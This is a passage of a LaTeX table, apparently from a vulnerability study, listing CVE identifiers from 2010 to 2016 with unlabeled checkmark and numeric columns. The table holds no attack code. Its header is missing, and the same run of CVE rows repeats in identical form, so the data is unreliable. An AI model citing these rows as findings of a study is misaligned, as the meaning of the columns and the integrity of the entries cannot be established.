1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule -CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & 